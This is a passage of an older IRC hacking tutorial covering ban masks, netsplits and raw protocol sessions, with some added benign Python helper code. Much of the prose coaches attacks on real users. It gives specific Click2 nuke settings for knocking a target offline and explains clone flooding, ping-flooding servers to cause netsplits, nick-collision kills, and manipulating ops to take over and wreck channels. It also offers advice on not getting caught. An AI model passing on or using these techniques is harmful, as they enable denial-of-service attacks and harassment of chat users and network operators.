  user - Your username. The IdentD sets this. When running an IdentD daemon it is mostly not faked, but when running Windows or connecting through a bouncer it is probably faked.
  host - The IP or hostmask.

Example: ^TCG!*@*.actcom.co.il
  ^TCG - Your nickname
  * - Your Ident user (defined as the wildcard ‘*’, meaning ANYTHING)
  *.actcom.co.il - The host mask

As you probably know, channels have different modes. For example +o makes a certain person an OP (Operator), +b bans a person, etc. To set a ban you type: /mode #Channel +b nick!user@host and to remove a ban you type /mode #Channel -b nick!user@host

On a raw session you don’t need the ‘/’.
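As an added example (not code from the tutorial), here is a small Python matcher that applies the nick!user@host wildcard format described above, so you can check which of a constructed list of users a given ban mask would catch. The sample users and the names mask_to_regex, split_prefix, mask_matches, ban_type and affected are chosen for this example.

```python
import re

# Turn one part of an IRC ban mask (* and ? wildcards) into a regex.
# Servers compare masks case-insensitively, so the regex does too.
def mask_to_regex(mask: str) -> "re.Pattern[str]":
    pattern = "".join(".*" if c == "*" else "." if c == "?" else re.escape(c)
                      for c in mask)
    return re.compile(f"^{pattern}$", re.IGNORECASE)

def split_prefix(prefix: str):
    """Split 'nick!user@host' into its three parts; missing parts become ''."""
    nick, _, rest = prefix.partition("!")
    user, _, host = rest.partition("@")
    return nick, user, host

def mask_matches(mask: str, prefix: str) -> bool:
    """True if each part of a full nick!user@host mask covers the matching
    part of the user's nick!user@host prefix."""
    return all(mask_to_regex(m).match(p) is not None
               for m, p in zip(split_prefix(mask), split_prefix(prefix)))

def ban_type(mask: str) -> str:
    """Report which prefix parts a mask constrains: the three ban types in the
    text come out as 'nick', 'user' and 'host'; a bare *!*@* is 'everyone'."""
    parts = [name for name, val in zip(("nick", "user", "host"), split_prefix(mask))
             if val != "*"]
    return "+".join(parts) if parts else "everyone"

def affected(mask: str, prefixes) -> list:
    """Which of the given nick!user@host prefixes the mask would ban."""
    return [p for p in prefixes if mask_matches(mask, p)]

# Constructed sample users (not from the page).
SAMPLE_USERS = [
    "^TCG^!tal@dialup-12.actcom.co.il",   # hit by the nick+host ban below
    "^tcg^!joe@ppp-7.actcom.co.il",       # same, only the case differs
    "^TCG^!tal@host.example.net",         # same nick, other host: not hit
    "The_Cat_Gang!u@h.example.net",       # hit by *T*C*G*!*@*
]

if __name__ == "__main__":
    for mask in ("^TCG^!*@*.actcom.co.il", "*T*C*G*!*@*", "*!*@*.actcom.co.il"):
        print(f"{mask} ({ban_type(mask)}): {affected(mask, SAMPLE_USERS)}")
```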

[I don't like your nickname... / Getting a user off the IRC]

The easiest way to get a user off the IRC is using a program called “Click2” for Windows.

It might not always work and it is considered extremely lame, but it might work sometimes.

After you got this program, do the following:

1. Set the “Packets to:” option box to “Client”.

2. In the Server textbox fill in the TARGET server. You can figure it out by doing a /whois or a /dns on the target’s nickname.

3. In the Client textbox fill in the TARGET IP address. You can also figure this out by doing a /whois or /dns on him, but if he uses any spoofing technique like a BNC or a Wingate it won’t harm him even a bit (it may harm the Wingate / Firewall / BNC, though).

4. Be sure that you set it to send 64 packets every 1000ms in the 2 textboxes at the end of the window.

5. The client start port should be 1024 and the stop port 1500.

6. Now hit nuke….

This is what you will see if it worked and you were in a channel, and the target is also in this channel:

*** Quits: ^TCG^ (Connection reset by peer)

(Or something like this)

The target should see something like this:

*** [10053] Software caused connection abort

If it is not working, you won’t see anything and he won’t either. If he is running some packet logger that logs ICMP packets he will see your IP, but most users do not run these.

Another lame way is to try winnuking the address. I won’t explain here how to do it and what winnuke is because it has nothing to do with this tutorial (see R a v e N’s DoS tutorial for Winnuke information, as well as information on more sophisticated attacks).

Here is a more complex way.

You will need a flood program like “Floods”. (Ask me if you want it)

After running it or any other flooding script that is based on clone loading, you connect the clones to the target IRC server. (~6 clones should do the job)

Before we continue, I want to explain to you how this works.

Each user on the IRC has something called SendQ and RecvQ. They contain the data the user is sending / receiving.

They also have a maximum value. If this value is reached, the server will automatically close their connection.

Flood programs and flood scripts load clones (computer-operated IRC “users”) and start sending lots of crap to the target nick, causing his RecvQ to fill up, and he should get disconnected :).

So after you launched the program, you start flooding. I can’t tell you exactly how because there are lots of programs and I can’t explain to you how every one works, but I can help you via my e-mail: talrun@actcom.co.il

There are also more advanced programs that support clone loading through firewalls and Wingates. When a user loses his connection to the IRC because of such an attack, everyone on every channel he was present on will see the following:

*** Quits: ^TCG^ (Excess Flood)

Another way of disconnecting a user from the IRC is exploiting a bug in his OS. You need to determine his OS and start this attack on him. There are lots of different types of attacks. To learn about them, read R a v e N’s DoS tutorial.

[Can I get caught and will I?]

First of all, it depends on what you are going to do or already did.

When you are going to take over a channel, for example, if you are doing it without hiding your identity first (see previous chapter) you can get caught, but nothing will probably happen to you. You might receive a DoS attack that can terminate your IRC session or lag you like hell. If you are using a bouncer, for example, you won’t get caught for this. But if you “click” someone and he logs the packets, he can e-mail your ISP with your IP and they might kill your account.

If you are killing someone with a netsplit (see next chapter) you won’t get caught and nothing will happen to you, since you haven’t done anything illegal.

Also, it is good to know as much as possible about your target. If you see someone that is named ‘Ass^Hole’, for example, you have no good reason to go packet him or flood him. He might have access to an OC3 or a DS-3 line (extremely fast connections to the Internet) and he might also detect your attacks and start flooding you in return. Trust me, you don’t want this to happen. One day my T3 line got ping flooded from an OC3 line and it stopped working for about 30 minutes. Just for your information, an OC3 can transfer up to 255Mbit and a T3 can transfer up to 9Mbit (I think). If such a line floods your computer you don’t stand a chance.

[What are netsplits and how can they help me?]

Large IRC networks consist of various servers. A NetSplit occurs when a link between one of the servers and the others gets broken because of lag or other reasons. All users that were connected to this server will be separated from the others as long as the netsplit lasts.

Therefore, lots of channels become empty and get closed. When you join a channel that became empty, or you left only 1 user in the channel and you cycle it, there is a chance that you will obtain the channel operator status (OP, @).

On a NetJoin (when the server relinks to the entire network again) you might still have the channel operator status. On new servers, you won’t get the operator status when the network is in split mode, but if you can find an old server or network you just might get lucky. Breaking a connection between 2 servers by yourself is very difficult. You need to pick 2 servers that are already lagged and start ping-flooding the target server from a fast connection.

Once a netjoin occurs, it is recommended to have a war script (we’ll get to those) that will DeOP everyone on the channel so other OPs won’t be able to DeOP you.

NetSplits can also let you disconnect a user from the IRC. Let’s say you want to disconnect a user named ‘Lamer’. When a netsplit occurs, there are two different possibilities:

1) The target user (‘Lamer’, in our case) was on the server that did the netsplit and has left the IRC network, but will return once a netjoin occurs (shouldn’t take a lot of time).

2) The user is still on the network and has nothing to do with the netsplit.

If number 1 occurs, then all you need to do is connect to the network using his nickname and wait for the netjoin. When the servers re-link they will see that there are 2 users with the same nickname. Such a thing cannot possibly happen, so one user must be killed. The user that was NOT on the network (which means he was on the split server) will probably get killed. If option 2 occurs, then all you can do is put a clone (open another IRC session), connect to the split server and change your nick to his nick. When the servers rejoin there is a small chance that he will get killed, so cross your fingers. :)

Now, for the 1,000,000$ question: how do I detect a netsplit? You can detect a netsplit if the user(s) quit message is “Server1 Server2”. For example:

Lamar has quit IRC (irc.magic.com irc.freei.net)
                    |             |_Server2
                    |_Server1

This message tells you that there is a split between irc.magic.com and irc.freei.net.

The second server (Server2) is the server that left the net.
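To make the netsplit detection above concrete, here is an added Python example (not from the tutorial) that scans client-rendered quit lines for the “Server1 Server2” pattern. It goes a step beyond the single quit line shown: it only reports a split when several users quit with the same server pair, which also rules out one user who typed a split-looking quit message by hand. The quit lines are constructed samples and the function names are chosen here.

```python
import re
from collections import defaultdict

# A quit line as the client shows it: "Lamar has quit IRC (irc.magic.com irc.freei.net)"
QUIT_RE = re.compile(r"^(\S+) has quit IRC \((.*)\)$")
# Something that looks like a server name: dotted labels, no spaces (a heuristic).
SERVER_RE = re.compile(r"^[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+$")

def parse_quit(line: str):
    """Return (nick, quit reason) for a quit line, or None for any other line."""
    m = QUIT_RE.match(line)
    return (m.group(1), m.group(2)) if m else None

def split_servers(reason: str):
    """If the reason is 'Server1 Server2', return that pair, else None. A user
    typed message such as 'bye all' is rejected because its words are not
    server names."""
    tokens = reason.split(" ")
    if len(tokens) == 2 and all(SERVER_RE.match(t) for t in tokens):
        return tokens[0], tokens[1]
    return None

def detect_netsplits(lines, min_users=2):
    """Group quits by server pair and report pairs that took at least min_users
    nicks with them as {(server1, server2): [nicks]}. Per the text, server2 is
    the one that left the net. Requiring several users filters out one person
    who set a split-looking quit message by hand."""
    by_pair = defaultdict(list)
    for line in lines:
        parsed = parse_quit(line)
        pair = split_servers(parsed[1]) if parsed else None
        if pair:
            by_pair[pair].append(parsed[0])
    return {pair: nicks for pair, nicks in by_pair.items() if len(nicks) >= min_users}

# Constructed sample log (not from the page): one real split, ordinary quits,
# and one user faking a split-style quit message.
SAMPLE_LOG = [
    "Lamar has quit IRC (irc.magic.com irc.freei.net)",
    "Guest42 has quit IRC (irc.magic.com irc.freei.net)",
    "JoeUser has quit IRC (Leaving)",
    "Bob has quit IRC (irc.magic.com irc.freei.net)",
    "Eve has quit IRC (bye all)",
    "Trickster has quit IRC (irc.fake.one irc.fake.two)",
]

if __name__ == "__main__":
    for (s1, s2), nicks in detect_netsplits(SAMPLE_LOG).items():
        print(f"netsplit {s1} <-> {s2}: {s2} left the net, taking {', '.join(nicks)}")
```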

[Channel Takeovers]

Channel takeovers are used to take a channel from a user, and prevent him from re-entering the channel or gaining operator status in the channel. The first thing you need to do is get ops. Here are 4 ways to get ops:

1. Via a NetSplit (might take a lot of time).

2. Asking one of the ops to let you be an op (who knows? You might get lucky).

3. Running a bot on your computer or on a shell account and telling the other ops that it is online 24 hours a day, and asking them to op it. They might do it; then tell the bot to op you.

4. You can always lure the other ops into giving you op by telling them that you will advertise their channel and bring them users, and you might earn the ops status.

You can do nothing without the OP status. Here is what you do after you got an op and you want to close their channel:

1. First, mass de-op all the users so they won’t kick or ban you. There are a lot of scripts out there that will do this for you.

2. Then place a ban on *!*@*

3. Mass-kick the channel (also with a script).

4. After this set the following modes: +smilk 1 1 (you type /mode #Channel +smilk 1 1).

5. You took over the channel! :)

There is a problem with this: when you leave the channel it will become empty and then closed. The only solution for this is placing a 24/7 (24 hours a day, 7 days a week) bot in the channel. If channel services are available on this network (like on DALnet), you can register the channel if no one else has done this already.

If you took over a registered channel, you will have a problem keeping it because Channel Services can give the channel back to its legal owner with no problem.

[How to completely ruin a channel]

Here are some possible ways to completely ruin a channel:

1) Turning the channel into an invite-only channel, so only people who were invited (to invite people, type /invite nick) can join.

2) Making the channel password-protected.

3) Making sure that you are the only OP in the channel, then turning the channel into moderated mode and then mass-devoicing everyone. In moderated mode, only voiced users (people with a little + at the beginning of their nick; to voice people, do /mode #channel +v nick, or -v to devoice) can talk. That way, users will be able to see who is on the channel (note: you can see who’s on a channel without joining it by typing /names #channel), but they won’t be able to chat, and they will have to listen to you… :)

[Some expansion about RAW sessions]

Too lazy to read the RFC?

Well, this is the “SUMMARY” of rfc1459 (IRC Protocol). Hopefully after reading this you’ll have a better understanding of how the protocol works (hey… don’t just use it… try to understand how it works). Yeah… this is also how some people spoof their IP by telneting from some restricted shell account with no IRC client access.

[Connecting to the IRC daemon]

Telnet/netcat (yep… we’re gonna use a raw socket) to the IRC port (6667/6668..etc) of the IRC server.

eg <:> telnet irc.dal.net 6667

Send your nick & username to be recognized after you got connected, using the user command in this form “user ”.

eg <:> user nobody localhost localhost :I’m nobody
eg <:> nick nobody

————————-[!! NOTE !!]————————-

At any time, if you receive anything like this

ping :1234567 <– The sequence number changes all the time

or

ping :192.0.0.1 <– Some IP address

you must send back the number with a pong

eg <:> pong :1234567

or

pong :192.0.0.1

If you don’t pong back, you’ll be disconnected with a ping timeout error.

———————[!! END OF NOTE !!]——————-

[Exploring some basic commands]

Ok, after the nick & user commands you can start chatting now. Type join #channel (without the /) to join #channel.

(Yea… most commands you use in your BitchX or mIRC client can also be used here too… just don’t include the /

eg: part #channel

quit :I’m out

etc… )

To send your message to a channel, use the privmsg command.

eg <:> privmsg #channel : Hi guys…Sup? (Don’t forget the “:” if you are going to send more than one word)

This will send “Hi guys…Sup?” to #channel.

To send a private message to a user:

eg <:> privmsg nickname : HI ya

This will send “HI ya” to nickname.

To set a mode on a channel you simply type mode #channel mode.

For example, MODE #Channel +b 192.114.*.* will ban everyone whose IP begins with 192.114.

[Fun stuff to do]

If you get something like this: “:nick!user@ip-address PRIVMSG your-nick :_VERSION_”

this means that nick is trying to ctcp/version you. This command is used to find out your client version.

Send the version back using the NOTICE command… it could be anything you want.

eg : NOTICE nick :_VERSION Telnet version 0.1 :) _

This will send “Telnet version 0.1 :)” as the version reply.
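The raw session described in the two sections above, as an added Python example that is not part of the tutorial: it splits server lines into prefix, command and parameters in the RFC 1459 layout, answers PING with PONG, and answers a CTCP VERSION request with a generic NOTICE so the reply gives away nothing about the client. The page renders the CTCP delimiter as “_”; on the wire it is the byte 0x01. The sample lines and the names parse_line and respond are constructed for this example.

```python
CTCP = "\x01"  # CTCP payloads are wrapped in 0x01 bytes; the page renders them as "_"

def parse_line(line: str):
    """Split one raw IRC line into (prefix, command, params) the RFC 1459 way:
    ':prefix COMMAND arg1 arg2 :trailing text with spaces'."""
    line = line.rstrip("\r\n")
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    head, sep, trailing = line.partition(" :")
    words = head.split()
    command, params = words[0].upper(), words[1:]
    if sep:
        params.append(trailing)  # the trailing parameter may contain spaces
    return prefix, command, params

def respond(line: str, my_nick: str, version_reply: str = "IRC client"):
    """Return the raw reply to send for one server line, or None if no reply
    is needed. Covers the two cases the text describes: PING (answer with
    PONG or the server drops you) and a CTCP VERSION request inside PRIVMSG."""
    prefix, command, params = parse_line(line)
    if command == "PING":
        return f"PONG :{params[-1] if params else ''}"
    if (command == "PRIVMSG" and params and params[0] == my_nick
            and params[-1].startswith(CTCP)):
        payload = params[-1].strip(CTCP)
        if payload.upper() == "VERSION":
            asker = (prefix or "").split("!")[0]
            # Replies travel as NOTICE; a generic string leaks no client details.
            return f"NOTICE {asker} :{CTCP}VERSION {version_reply}{CTCP}"
    return None

# Constructed sample session (not from the page).
SAMPLE_SERVER_LINES = [
    "PING :1234567",
    ":irc.dal.net PING :192.0.0.1",
    f":someone!user@1.2.3.4 PRIVMSG nobody :{CTCP}VERSION{CTCP}",
    ":someone!user@1.2.3.4 PRIVMSG #channel :Hi guys...Sup?",
]

if __name__ == "__main__":
    for raw in SAMPLE_SERVER_LINES:
        print("<<", repr(raw))
        reply = respond(raw, my_nick="nobody")
        if reply:
            print(">>", repr(reply))
```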

[Faking /CTCP Replies]

Now many of you guys chat and have various people always doing CTCP {Client-To-Client Protocol} requests, i.e. VERSION, TIME, FINGER, PING, on you. These replies can get you in a lot of trouble; mainly it’s a way for people to gather information about you and then start up an attack. Now it is time to change the replies your mIRC will give in a way to cause the other end to be fooled. Well, this topic has been covered by many writers and warscript developers, but many don’t know about changing the replies to their advantage. Well, look no further, here we go!

One of the most devastating attacks can come from a VERSION reply. To do a ctcp version request on a user, all you have to do is type:

“/ctcp VERSION ” This will return the nick’s irc client.

Now you may ask why that is important. Well, let’s say you’re using mIRC 5.7x, which suffers from a heap overflow of 217 bytes, and 5.8 a heap overflow of 226 bytes. By knowing your version an attacker already knows which operating system you’re using and a version, so they can hack you without a trojan and you won’t know it happened.

Let’s kill the version reply to either give a fake reply or no reply at all, so they can sit there waiting, lol.

Okay, you will need a hex editor for this. I recommend Hiew.

- Make a backup of your mirc32.exe.

- Install Hiew, load it up; once you have clicked mirc32.exe you will see some garbage. Press F7, which should pop up the search box; type in VERSION and you should be able to find the reply, something like mIRC32 v5.8 K.Mardam-Bey. Now just delete the reply. If you have trouble doing it with Hiew then get ano